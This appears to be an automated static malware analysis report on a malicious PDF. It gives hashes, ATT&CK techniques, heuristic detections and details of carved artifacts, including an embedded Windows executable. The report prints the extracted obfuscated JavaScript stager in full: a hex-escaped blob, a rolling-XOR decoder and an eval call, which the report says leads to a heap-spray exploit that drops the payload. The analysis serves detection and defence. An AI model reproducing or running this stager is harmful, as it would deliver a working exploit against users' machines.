Malicious PDF — malware analysis report

Static analysis result for SHA-256 04ff79742ee87f5b…

MALICIOUS

PDF

2.09 MB First seen: 2021-06-20
MD5: 8d6833863864c7b5d63a6394c6dbc082 SHA-1: 1e0925121222fd787555bdc58b8bcf03733892be SHA-256: 04ff79742ee87f5b353590b2a1ec20211401cb153e0fe39927f93f59bd3e8e0d
424 Risk Score

Malware Insights

MITRE ATT&CK
T1059.007 JavaScript T1203 Exploitation for Client Execution

The PDF file contains obfuscated JavaScript that performs a heap spray and is designed to exploit a vulnerability. This script is responsible for dropping and executing a Windows executable payload. The presence of a PE payload and the exploit cluster heuristics indicate a high likelihood of malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9983

Heuristics 9

  • JavaScript action low 3 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Obfuscated multi-stage PDF JavaScript heap-spray exploit critical CVE related PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY
    PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    function ffts(str, q0, chr) { if(q0>str.length-1) return str; return str.substr(0,q0) + chr + str.substr(q0+1); } s1 = '\x49\x28\x5a\x7a\x25\x7a\x02\x7a\x4a\x7b\x5b\x66\x46\x33\x5d\x38\x4b\x28\x49\x39\x5c\x67\x47\x18\x47\x35\x4d\x7d\x4f\x6f\x52\x72\x55\x70\x05\x31\x00\x34\x05\x20\x55\x61\x50\x64\x55\x70\x05\x33\x00\x61\x54\x71\x04\x30\x51\x69\x59\x7c\x09\x39\x09\x39\x09\x2c\x59\x6d\x0c\x34\x55\x70\x05\x37\x06\x3f\x09\x2c\x59\x6d\x0c\x34\x04\x21\x54\x65\x03\x3a\x0a\x2f\x5a\x6e\x0f\x37\x07\x22\x57 …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Win.Malware.Agentb-9808245-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Malware.Agentb-9808245-0
  • Embedded Windows executable payload in PDF stream critical PDF_EMBEDDED_PE_PAYLOAD
    PDF stream bytes contain an embedded Windows executable with a verified PE header. Exploit chains often hide droppers inside ordinary streams rather than standard /EmbeddedFile attachments.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • XFA form low PDF_XFA
    PDF uses XML Forms Architecture — can contain script logic
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xdp/ In PDF document text
    • http://www.xfa.org/schema/xci/2.6/In PDF document text
    • http://www.xfa.org/schema/xfa-template/2.6/In PDF document text

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0012_000.js pdf-javascript-stream PDF /JS object 12 at offset 0x20FAA2 13967 bytes
SHA-256: d5143d101bd3d5f5711b507d0d62b473189a38d21b4b9560b361fbcd59f5d4c7
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long hex-escaped blob(s).
Preview script
First 1,000 lines of the extracted script
function ffts(str, q0, chr) { if(q0>str.length-1) return str; return str.substr(0,q0) + chr + str.substr(q0+1); } s1 = '\x49\x28\x5a\x7a\x25\x7a\x02\x7a\x4a\x7b\x5b\x66\x46\x33\x5d\x38\x4b\x28\x49\x39\x5c\x67\x47\x18\x47\x35\x4d\x7d\x4f\x6f\x52\x72\x55\x70\x05\x31\x00\x34\x05\x20\x55\x61\x50\x64\x55\x70\x05\x33\x00\x61\x54\x71\x04\x30\x51\x69\x59\x7c\x09\x39\x09\x39\x09\x2c\x59\x6d\x0c\x34\x55\x70\x05\x37\x06\x3f\x09\x2c\x59\x6d\x0c\x34\x04\x21\x54\x65\x03\x3a\x0a\x2f\x5a\x6e\x0f\x37\x07\x22\x57\x6e\x5e\x6d\x0e\x2b\x5e\x6a\x0b\x33\x07\x22\x57\x35\x03\x3a\x08\x2d\x58\x6c\x0d\x35\x05\x20\x55\x64\x54\x62\x56\x73\x06\x32\x53\x6b\x5b\x7e\x0b\x39\x0b\x68\x50\x75\x00\x34\x55\x6d\x58\x7d\x08\x38\x08\x38\x08\x2d\x58\x69\x59\x69\x59\x7c\x09\x39\x09\x39\x09\x2c\x59\x69\x59\x69\x59\x7c\x09\x39\x09\x39\x09\x2c\x59\x69\x59\x69\x59\x7c\x09\x39\x09\x39\x0b\x2e\x5b\x6b\x5b\x6b\x5b\x7e\x0b\x3b\x0a\x3a\x08\x2d\x58\x68\x58\x68\x58\x7d\x08\x38\x08\x38\x08\x2d\x58\x68\x58\x68\x58\x7d\x08\x3e\x0d\x6c\x59\x7c\x09\x3d\x5c\x64\x54\x71\x04\x35\x05\x33\x07\x22\x57\x63\x02\x3a\x0a\x2f\x5a\x68\x0c\x6e\x5c\x79\x0c\x38\x59\x61\x55\x70\x05\x37\x56\x34\x05\x20\x55\x61\x00\x38\x08\x2d\x58\x68\x58\x68\x50\x75\x00\x30\x00\x30\x00\x25\x50\x31\x09\x68\x5e\x7b\x0e\x3a\x5b\x63\x53\x76\x03\x32\x54\x6d\x5d\x78\x0d\x39\x58\x60\x50\x75\x00\x39\x09\x3a\x02\x27\x52\x66\x07\x3f\x0b\x2e\x5b\x39\x0f\x36\x04\x21\x54\x60\x01\x39\x09\x2c\x59\x68\x58\x6e\x5a\x7f\x0a\x3e\x5f\x67\x57\x72\x07\x61\x07\x61\x07\x22\x57\x31\x57\x31\x57\x72\x07\x37\x07\x37\x07\x22\x57\x67\x57\x67\x57\x72\x07\x37\x07\x33\x03\x26\x53\x63\x53\x63\x53\x76\x03\x33\x03\x33\x03\x26\x53\x63\x53\x63\x53\x76\x03\x33\x03\x33\x03\x26\x53\x63\x53\x63\x52\x77\x02\x32\x02\x32\x02\x27\x52\x62\x52\x62\x52\x77\x02\x34\x07\x66\x53\x76\x03\x37\x56\x6e\x5e\x7b\x0e\x3f\x0f\x39\x0d\x28\x5d\x69\x08\x30\x00\x25\x50\x62\x06\x64\x56\x73\x06\x32\x53\x6b\x5f\x7a\x0f\x3d\x5c\x3e\x0f\x2a\x5f\x6b\x0a\x32\x02\x27\x52\x62\x52\x62\x5a\x7f\x0a\x3a\x0a\x3a\x0a\x2f\x5a\x3b\x03\x62\x54\x71\x04\x30\x51\x69\x59\x7c\x09\x38\x5e\x67\x57\x72\x07\x33\x52\x6a\x5a\x7f\x0a\x33\x03\x30\x00\x25\x50\x64\x05\x3d\x09\x2c\x59\x3b\x0d\x34\x06\x23\x56\x62\x03\x3b\x0b\x2e\x5b\x6a\x5a\x6c\x58\x7d\x08\x3c\x5d\x65\x55\x70\x05\x63\x05\x63\x05\x20\x55\x33\x55\x33\x55\x70\x05\x35\x05\x37\x05\x20\x55\x65\x55\x65\x55\x70\x05\x35\x05\x35\x05\x20\x55\x65\x55\x65\x55\x70\x05\x35\x05\x35\x05\x20\x55\x65\x55\x65\x55\x70\x05\x35\x05\x35\x05\x20\x55\x65\x55\x65\x54\x71\x04\x32\x01\x60\x55\x70\x05\x31\x50\x68\x58\x7d\x08\x38\x08\x38\x0c\x29\x5c\x68\x09\x31\x50\x75\x00\x32\x03\x3a\x0c\x29\x5c\x68\x09\x31\x01\x24\x51\x67\x54\x35\x00\x25\x50\x64\x05\x3d\x0d\x28\x5d\x6c\x5c\x6a\x5e\x7b\x0e\x3a\x5b\x63\x53\x76\x03\x31\x55\x37\x05\x20\x55\x61\x00\x38\x0c\x29\x5c\x6e\x0f\x6d\x5c\x79\x0c\x38\x59\x61\x51\x74\x01\x31\x01\x32\x02\x27\x52\x62\x52\x62\x52\x77\x02\x63\x5b\x3a\x0c\x29\x5c\x68\x09\x31\x01\x24\x51\x60\x06\x3f\x0f\x2a\x5f\x6b\x0a\x32\x02\x27\x52\x62\x52\x62\x56\x73\x06\x32\x53\x6b\x0a\x2f\x5a\x3b\x0c\x68\x50\x75\x00\x34\x55\x6d\x5d\x78\x0d\x3b\x08\x69\x5c\x79\x0c\x38\x59\x61\x51\x74\x01\x30\x00\x36\x02\x27\x52\x66\x07\x3f\x0f\x2a\x5f\x6d\x09\x6b\x59\x7c\x09\x3d\x5c\x64\x50\x75\x00\x32\x53\x31\x00\x25\x50\x64\x05\x3d\x0d\x28\x5d\x6d\x5d\x6f\x5f\x7a\x0f\x3f\x0f\x3f\x0f\x2a\x5f\x3e\x06\x67\x51\x74\x01\x35\x54\x6c\x5c\x79\x0c\x3a\x09\x68\x5d\x78\x0d\x39\x58\x60\x50\x75\x00\x31\x01\x37\x03\x26\x53\x67\x06\x3e\x0e\x2b\x5e\x3f\x5a\x3e\x5d\x78\x0d\x39\x58\x60\x50\x75\x00\x31\x57\x6e\x5e\x7b\x0e\x3a\x5b\x63\x53\x76\x03\x33\x03\x30\x04\x21\x54\x64\x54\x64\x54\x71\x04\x60\x55\x6d\x58\x7d\x08\x3c\x5d\x65\x55\x70\x05\x33\x00\x61\x54\x71\x04\x30\x51\x69\x59\x7c\x09\x38\x08\x3e\x0a\x2f\x5a\x6e\x0f\x37\x07\x22\x57\x65\x01\x63\x51\x74\x01\x35\x54\x6c\x58\x7d\x08\x3a\x5b\x39\x08\x2d\x58\x6c\x0d\x35\x05\x20\x55\x65\x55\x65\x04\x21\x54\x64\x54\x64\x54\x71\x04\x65\x5d\x3c\x0a\x2f\x5a\x6e\x0f\x37\x07\x22\x57\x66\x00\x39\x09\x2c\x59\x6d\x0c\x34\x04\x21\x54\x6d\x5c\x6b\x5b\x7e\x0b\x3f\x5e\x66\x52\x77\x02\x60\x56\x6f\x5d\x78\x0d\x39\x58\x60\x50\x75\x00\x66\x00\x66\x00\x25\x50\x36\x50\x36\x50\x75\x00\x66\x00\x66\x00\x25\x50\x36\x50\x36\x50\x75\x00\x66\x00\x66\x00\x25\x50\x36\x50\x36\x50\x75\x00\x31\x01\x31\x01\x24\x51\x61\x51\x61\x51\x76\x4d\x6d\x32\x6d\x1f\x67\x57\x66\x46\x7b\x5b\x7c\x59\x2c\x1d\x29\x4c\x2e\x0b\x7e\x1c\x2e\x1b\x23\x06\x73\x4b\x2a\x13\x2b\x0e\x7b\x48\x7a\x4b\x73\x56\x23\x1b\x23\x47\x26\x03\x76\x42\x72\x43\x7b\x5e\x2b\x18\x20\x18\x29\x0c\x79\x1d\x7c\x18\x79\x5c\x29\x4d\x2c\x48\x29\x0c\x79\x1f\x2e\x19\x2c\x09\x7c\x4c\x79\x1c\x7e\x5b\x2e\x4b\x7c\x19\x21\x04\x71\x17\x71\x17\x71\x54\x21\x17\x23\x45\x23\x06\x73\x42\x75\x13\x23\x06\x73\x4b\x7b\x4d\x2c\x09\x7c\x1a\x2a\x4c\x75\x50\x25\x12\x77\x45\x76\x53\x26\x47\x75\x17\x20\x05\x70\x13\x2a\x4c\x7c\x59\x2c\x1f\x7e\x1c\x2b\x0e\x7b\x1d\x2d\x14\x2d\x08\x7d\x4a\x2b\x4a\x7b\x5e\x2b\x1a\x78\x1d\x28\x0d\x78\x1b\x29\x4f\x7f\x5a\x2f\x4d\x2e\x1a\x79\x5c\x29\x4f\x7f\x4f\x2c\x09\x7c\x4c\x29\x1b\x7a\x5f\x2a\x49\x7a\x19\x7f\x5a\x2f\x18\x7a\x1c\x2c\x09\x7c\x1a\x7c\x4c\x2a\x0f\x7a\x1c\x2c\x1d\x24\x01\x74\x12\x77\x14\x72\x57\x22\x14\x23\x1a\x2f\x0a\x7f\x4f\x7c\x1a\x2a\x0f\x7a\x4b\x78\x49\x2f\x0a\x7f\x19\x29\x1e\x7a\x5f\x2a\x4b\x2e\x1c\x7d\x58\x2d\x15\x77\x4e\x79\x5c\x29\x4d\x2f\x49\x79\x5c\x29\x1a\x2e\x1c\x2a\x0f\x7a\x1c\x2c\x18\x2b\x0e\x7b\x43\x21\x10\x26\x03\x76\x45\x71\x48\x7a\x5f\x2a\x1c\x7f\x4e\x7d\x58\x2d\x1a\x2e\x1f\x7d\x58\x2d\x1c\x2f\x4b\x73\x56\x23\x42\x20\x16\x22\x07\x72\x13\x71\x45\x24\x01\x74\x12\x71\x45\x24\x01\x74\x17\x25\x14\x27\x02\x77\x46\x75\x14\x2c\x09\x7c\x45\x71\x15\x26\x03\x76\x12\x23\x12\x21\x04\x71\x40\x73\x4b\x7f\x5a\x2f\x16\x26\x40\x71\x54\x21\x45\x7c\x4d\x7e\x5b\x2e\x1f\x2c\x4e\x76\x53\x26\x47\x77\x4e\x7f\x5a\x2f\x17\x27\x44\x7c\x59\x2c\x1a\x78\x1d\x79\x5c\x29\x4f\x77\x44\x71\x54\x21\x45\x21\x10\x23\x06\x73\x42\x71\x10\x24\x01\x74\x4d\x29\x4d\x79\x5c\x29\x10\x72\x17\x27\x02\x77\x46\x75\x40\x75\x50\x25\x47\x7f\x1c\x2d\x08\x7d\x49\x7c\x45\x27\x02\x77\x12\x23\x12\x21\x04\x71\x15\x22\x1a\x2a\x0f\x7a\x1b\x78\x49\x7a\x5f\x2a\x13\x71\x43\x70\x55\x20\x10\x21\x17\x73\x56\x23\x11\x27\x1e\x29\x0c\x79\x18\x2a\x13\x76\x53\x26\x43\x20\x15\x76\x53\x26\x13\x2a\x13\x23\x06\x73\x4a\x2c\x19\x2b\x0e\x7b\x4f\x77\x4e\x2c\x09\x7c\x4b\x78\x1c\x79\x5c\x29\x48\x7b\x4d\x74\x51\x24\x46\x25\x46\x25\x00\x75\x10\x74\x4c\x78\x5d\x28\x19\x2a\x1d\x7e\x5b\x2e\x4c\x2f\x4c\x7d\x58\x2d\x19\x2c\x15\x77\x52\x27\x16\x25\x43\x26\x03\x76\x13\x20\x41\x75\x50\x25\x46\x77\x46\x75\x50\x25\x1c\x7e\x46\x72\x57\x22\x1b\x79\x4d\x78\x5d\x28\x1a\x29\x4b\x7f\x5a\x2f\x4c\x7b\x4b\x2f\x0a\x7f\x1c\x7a\x49\x7a\x5f\x2a\x4b\x7e\x18\x21\x04\x71\x47\x26\x17\x20\x05\x70\x16\x2f\x17\x27\x02\x77\x45\x26\x43\x27\x02\x77\x40\x74\x45\x76\x53\x26\x11\x25\x14\x76\x53\x26\x17\x26\x43\x73\x56\x23\x15\x21\x44\x71\x54\x21\x18\x7b\x1d\x2f\x0a\x7f\x1c\x7f\x1c\x2a\x0f\x7a\x4c\x7b\x18\x7d\x58\x2d\x19\x21\x42\x24\x01\x74\x10\x74\x45\x74\x51\x24\x15\x77\x43\x7b\x5e\x2b\x1d\x2a\x1c\x2c\x09\x7c\x45\x20\x45\x21\x04\x71\x44\x21\x10\x72\x57\x22\x41\x24\x1d\x7e\x5b\x2e\x19\x2d\x1a\x29\x0c\x79\x40\x78\x19\x2c\x09\x7c\x45\x7d\x1f\x27\x02\x77\x12\x77\x4e\x76\x53\x26\x40\x72\x44\x26\x03\x76\x10\x22\x1b\x23\x06\x73\x15\x25\x1c\x24\x01\x74\x4d\x2f\x4d\x75\x50\x25\x1c\x24\x1d\x25\x00\x75\x43\x74\x17\x72\x57\x22\x16\x75\x16\x70\x55\x20\x44\x20\x11\x24\x01\x74\x12\x20\x17\x74\x51\x24\x47\x7f\x46\x7e\x5b\x2e\x16\x75\x13\x21\x04\x71\x15\x71\x40\x75\x50\x25\x46\x7e\x49\x79\x5c\x29\x1f\x28\x4b\x2e\x0b\x7e\x4a\x7a\x19\x7f\x5a\x2f\x1a\x22\x13\x77\x52\x27\x13\x72\x17\x74\x51\x24\x41\x74\x45\x7c\x59\x2c\x49\x71\x46\x76\x53\x26\x40\x71\x17\x20\x05\x70\x15\x71\x14\x70\x55\x20\x11\x28\x1d\x2c\x09\x7c\x4b\x7f\x1a\x2f\x0a\x7f\x19\x2e\x4f\x7a\x5f\x2a\x1b\x2d\x4e\x28\x0d\x78\x4d\x75\x10\x74\x51\x24\x41\x25\x14\x25\x00\x75\x44\x77\x40\x70\x55\x20\x16\x26\x42\x26\x03\x76\x12\x76\x4f\x2d\x08\x7d\x44\x26\x10\x73\x56\x23\x15\x2d\x49\x2d\x08\x7d\x19\x7d\x4c\x7d\x58\x2d\x4e\x76\x41\x75\x50\x25\x41\x79\x1f\x2d\x08\x7d\x1e\x78\x4e\x79\x5c\x29\x18\x29\x1e\x2a\x0f\x7a\x4d\x2e\x4a\x2e\x0b\x7e\x4b\x73\x42\x26\x03\x76\x47\x24\x1d\x2a\x0f\x7a\x43\x7a\x18\x79\x5c\x29\x10\x28\x11\x29\x0c\x79\x1d\x79\x48\x7d\x58\x2d\x4b\x79\x4e\x76\x53\x26\x45\x7d\x44\x7c\x59\x2c\x49\x2d\x1b\x2c\x09\x7c\x4a\x7d\x4a\x7e\x5b\x2e\x19\x7a\x1f\x7b\x5e\x2b\x1d\x2a\x49\x2c\x09\x7c\x48\x78\x1b\x7d\x58\x2d\x18\x20\x11\x75\x50\x25\x14\x77\x4e\x79\x5c\x29\x10\x29\x10\x22\x07\x72\x4b\x73\x4a\x72\x57\x22\x14\x23\x40\x25\x00\x75\x42\x7a\x19\x7f\x5a\x2f\x4c\x79\x48\x7b\x5e\x2b\x12\x70\x47\x24\x01\x74\x42\x7a\x19\x2c\x09\x7c\x1f\x2a\x1b\x2a\x0f\x7a\x43\x21\x16\x2e\x0b\x7e\x48\x2b\x48\x7d\x58\x2d\x4e\x7b\x4a\x7b\x5e\x2b\x1a\x29\x1d\x29\x0c\x79\x4f\x7f\x1b\x2e\x0b\x7e\x1a\x2e\x4f\x77\x52\x27\x11\x26\x1f\x2c\x09\x7c\x4a\x78\x4f\x2e\x0b\x7e\x49\x7d\x4c\x75\x50\x25\x1c\x25\x1c\x7f\x5a\x2f\x16\x2e\x17\x2f\x0a\x7f\x19\x7d\x4c\x7d\x58\x2d\x4b\x7b\x4f\x7f\x5a\x2f\x49\x2b\x49\x7e\x5b\x2e\x4c\x2d\x4f\x77\x52\x27\x41\x25\x43\x73\x56\x23\x45\x21\x44\x74\x51\x24\x42\x72\x10\x28\x0d\x78\x1e\x2b\x4d\x2f\x0a\x7f\x1d\x2b\x4d\x2e\x0b\x7e\x18\x7c\x4d\x7c\x59\x2c\x1a\x2d\x18\x2c\x09\x7c\x48\x78\x1d\x79\x5c\x29\x10\x73\x15\x25\x00\x75\x4c\x74\x4d\x74\x51\x24\x12\x25\x1c\x24\x01\x74\x42\x7a\x19\x7f\x5a\x2f\x1a\x22\x13\x77\x52\x27\x16\x75\x4c\x7b\x5e\x2b\x12\x2a\x1f\x27\x02\x77\x4e\x76\x4f\x77\x52\x27\x43\x27\x1e\x7c\x59\x2c\x1d\x2e\x1a\x2a\x0f\x7a\x4b\x78\x4e\x7e\x5b\x2e\x19\x7a\x1f\x7b\x5e\x2b\x4f\x7a\x4b\x78\x5d\x28\x1e\x7c\x4a\x72\x57\x22\x46\x71\x42\x21\x04\x71\x14\x21\x10\x21\x04\x71\x40\x73\x46\x76\x53\x26\x10\x24\x41\x74\x51\x24\x1d\x7c\x1a\x28\x0d\x78\x1d\x79\x4f\x78\x5d\x28\x1e\x29\x1d\x2d\x08\x7d\x4a\x7a\x19\x7f\x5a\x2f\x4b\x2f\x1e\x2f\x0a\x7f\x4e\x2c\x18\x7b\x5e\x2b\x1d\x2a\x1c\x2c\x09\x7c\x4d\x2e\x17\x20\x05\x70\x49\x71\x41\x71\x54\x21\x18\x20\x19\x21\x04\x71\x14\x70\x46\x71\x54\x21\x17\x20\x16\x75\x50\x25\x12\x2a\x4f\x2b\x0e\x7b\x4d\x7a\x19\x21\x04\x71\x46\x25\x46\x20\x05\x70\x15\x71\x47\x70\x55\x20\x16\x21\x15\x76\x53\x26\x11\x29\x4a\x2c\x09\x7c\x45\x7d\x1b\x29\x0c\x79\x1d\x79\x48\x7b\x5e\x2b\x4d\x28\x1d\x2d\x08\x7d\x44\x7c\x49\x2f\x0a\x7f\x46\x7e\x1c\x7d\x58\x2d\x48\x2c\x1a\x2d\x08\x7d\x4b\x7c\x49\x7d\x58\x2d\x1b\x78\x1b\x7d\x58\x2d\x1b\x2b\x1a\x78\x5d\x28\x4d\x28\x10\x27\x02\x77\x41\x76\x13\x71\x54\x21\x15\x21\x42\x24\x01\x74\x45\x76\x12\x2a\x0f\x7a\x4b\x29\x1f\x2f\x0a\x7f\x49\x7e\x4b\x7a\x5f\x2a\x48\x29\x1b\x23\x06\x73\x40\x76\x40\x21\x04\x71\x42\x74\x42\x23\x06\x73\x16\x72\x43\x70\x55\x20\x41\x23\x17\x27\x02\x77\x46\x74\x41\x70\x55\x20\x19\x2e\x17\x74\x51\x24\x46\x27\x46\x72\x57\x22\x1b\x7e\x1b\x78\x5d\x28\x11\x72\x43\x73\x56\x23\x47\x7e\x47\x71\x54\x21\x17\x75\x42\x71\x54\x21\x19\x2d\x1c\x29\x0c\x79\x4c\x29\x10\x26\x03\x76\x4f\x77\x4e\x2c\x09\x7c\x45\x7d\x1b\x29\x0c\x79\x1c\x78\x4e\x79\x5c\x29\x18\x2b\x1f\x2f\x0a\x7f\x49\x7d\x18\x2d\x08\x7d\x1e\x78\x4e\x79\x5c\x29\x4f\x2a\x1d\x2d\x08\x7d\x44\x26\x13\x75\x50\x25\x1c\x24\x46\x27\x02\x77\x13\x77\x46\x77\x52\x27\x16\x74\x43\x73\x56\x23\x15\x22\x14\x24\x01\x74\x15\x76\x13\x70\x55\x20\x45\x21\x17\x20\x05\x70\x16\x24\x10\x28\x0d\x78\x4e\x79\x1d\x25\x00\x75\x42\x76\x15\x73\x56\x23\x47\x23\x12\x23\x06\x73\x42\x26\x12\x71\x54\x21\x44\x27\x12\x2a\x0f\x7a\x4b\x78\x1a\x7e\x5b\x2e\x1f\x2c\x1a\x2a\x0f\x7a\x4e\x7a\x1f\x7b\x5e\x2b\x4f\x7a\x4b\x78\x5d\x28\x1e\x7c\x4a\x7a\x5f\x2a\x1b\x28\x1b\x78\x5d\x28\x1e\x2a\x4f\x7a\x5f\x2a\x4f\x2b\x1d\x2a\x0f\x7a\x19\x21\x15\x2d\x08\x7d\x18\x7c\x4a\x7d\x58\x2d\x1b\x2c\x1b\x2b\x0e\x7b\x4c\x2f\x4c\x2a\x0f\x7a\x1f\x7b\x4d\x7a\x5f\x2a\x1c\x2b\x1c\x2c\x09\x7c\x4b\x73\x10\x76\x53\x26\x1f\x27\x41\x73\x56\x23\x46\x22\x14\x23\x06\x73\x45\x72\x47\x73\x56\x23\x15\x76\x15\x73\x56\x23\x40\x26\x10\x27\x02\x77\x11\x23\x15\x25\x00\x75\x16\x2e\x17\x2f\x0a\x7f\x1c\x7a\x4c\x7b\x5e\x2b\x4f\x2e\x18\x2c\x09\x7c\x18\x79\x1d\x7c\x59\x2c\x48\x29\x4d\x2c\x0b\x30\x10\x66\x07\x75\x55\x0a\x55\x2d\x55\x65\x57\x77\x4a\x6a\x35\x6a\x12\x6a\x5a\x6b\x43\x63\x3c\x63\x11\x69\x59\x6b\x4b\x60\x40\x1f\x40\x32\x4a\x7a\x4b\x6b\x42\x79\x59\x2f\x4e\x3c\x1c\x43\x1c\x64\x1c\x2c\x1f\x3f\x02\x22\x7d\x22\x5a\x22\x12\x23\x0b\x2b\x09\x2c\x0e\x2e\x05\x25\x07\x72\x50\x70\x5b\x7b\x59\x69\x4b\x6b\x40\x60\x42\x21\x03\x23\x08\x28\x0a\x3a\x18\x38\x13\x33\x11\x72\x50\x70\x5b\x7b\x59\x7c\x09\x2b\x0b\x20\x00\x22\x12\x30\x10\x3b\x1b\x39\x5a\x78\x58\x73\x53\x71\x41\x63\x43\x68\x48\x6a\x09\x2b\x0b\x22\x19\x39\x4e\x26\x4f\x23\x46\x66\x4e\x11\x4e\x36\x4e\x7e\x4d\x63\x0f\x6a\x04\x63\x17\x7f\x5f\x74\x54\x66\x56\x76\x5d\x7d\x45\x65\x59\x79\x4f\x7a\x4f\x7c\x4a\x63\x43\x1c\x43\x3b\x43\x73\x40\x6b\x56\x09\x56\x2e\x56\x66\x55\x6e\x4e\x11\x4e\x36\x4e\x7e\x4a\x6a\x57\x77\x28\x77\x0f\x77\x47\x74\x5a\x29\x5c\x3e\x4d\x39\x4b\x22\x4c\x2b\x03\x33\x1f\x3f\x17\x27\x5f\x6f\x0c\x3c\x5f\x72\x42\x3a\x08\x3c\x15\x3a\x08\x21\x1a\x3a\x65\x3a\x42\x3a\x0a\x3e\x1e\x35\x08\x28\x77\x28\x50\x28\x18\x2a\x11\x31\x6e\x31\x49\x31\x01\x35\x15\x3e\x03\x23\x7c\x23\x5b\x23\x13\x20\x1b\x3b\x64\x3b\x43\x3b\x0b\x3e\x1e\x23\x03\x5c\x03\x7b\x03\x33\x07\x29\x5a\x2f\x4d\x3e\x4a\x38\x51\x3f\x58\x70\x40\x6c\x4c\x7a\x4f\x7a\x49\x7f\x50\x62\x4b\x70\x50\x27\x4f\x26\x4a\x2f\x07\x58\x07\x7f\x07\x37\x02\x2c\x40\x25\x4b\x2c\x58\x30\x10\x2c\x0c\x3c\x44\x7c\x4c\x7c\x4c\x7c\x55\x75\x2a\x75\x0d\x75\x45\x70\x50\x7b\x46\x66\x39\x66\x1e\x66\x56\x63\x58\x78\x27\x78\x00\x78\x48\x7e\x5e\x63\x43\x1c\x43\x3b\x43\x73\x46\x68\x1b\x6e\x0c\x7f\x0b\x79\x10\x7e\x19\x31\x01\x2d\x0d\x3d\x45\x7d\x4d\x7d\x4d\x7d\x5d\x70\x50\x78\x48\x30\x01\x31\x03\x33\x1e\x2e\x56\x66\x5e\x77\x57\x78\x58\x6a\x43\x78\x58\x2e\x4f\x3d\x1d\x42\x1d\x65\x1d\x2d\x1a\x3a\x07\x27\x49\x2c\x5b\x7b\x3a\x48\x3a\x5b\x22\x0a\x23\x18\x38\x5e\x31\x43\x63\x4b\x14\x4b\x33\x4b\x7b\x43\x7e\x4e\x75\x2a\x75\x0d\x75\x45\x7d\x41\x71\x09\x38\x5e\x6e\x55\x0a\x55\x2d\x55\x65\x5d\x76\x5d\x74\x54\x0b\x54\x2c\x54\x64\x53\x08\x57\x08\x70\x08\x38\x00\x5d\x60\x3f\x60\x18\x60\x50\x66\x4d\x6f\x1c\x3e\x05'; __x01 = 0x3F; for(__p01=0; __p01 < s1.length; __p01++) { r01__ = s1.charCodeAt(__p01) ^ __x01; __x01 = s1.charCodeAt(__p01); s1 = ffts(s1, __p01, String.fromCharCode(r01__)); } eval(s1);
embedded_pdf_00000346.exe embedded-pe PDF raw stream PE payload at offset 0x346 2152098 bytes
SHA-256: 05b5983adb76335d14e5d983ada1760dce0b5514d88015b8ad45faca8b41225d
Detection
ClamAV: Win.Malware.Agentb-9808245-0
Obfuscation or payload: likely
actual_type=PE; declared_or_context_type=PDF; filename=embedded_pdf_00000346.exe; kind=embedded-pe Carved artifact entropy is 7.82, consistent with packed or encrypted content.

Open this report in the interactive analyzer, or submit your own file for analysis.